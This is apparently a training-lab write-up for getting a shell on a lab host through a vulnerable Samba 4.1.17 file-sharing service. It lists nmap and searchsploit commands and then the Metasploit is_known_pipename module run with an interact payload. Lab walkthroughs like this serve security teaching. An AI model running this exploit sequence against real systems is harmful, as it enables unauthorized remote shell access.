Vulnerable File Sharing Service

Lab Environment

In this lab environment, you will be provided with GUI access to a Kali machine. The target machine will be accessible at demo.ine.local.

Your task is to fingerprint the application using command line tools available on the Kali terminal and then exploit the application using the appropriate Metasploit module. Get a shell on the target!

Objective: Get a shell on the target by exploiting a file-sharing service.

Tools

• Nmap

• Metasploit Framework

Writeup

nmap -sSVC demo.ine.local

searchsploit Samba 4.1.17

msfconsole
use exploit/linux/samba/is_known_pipename
set rhosts demo.ine.local
set payload payload/cmd/unix/interact
run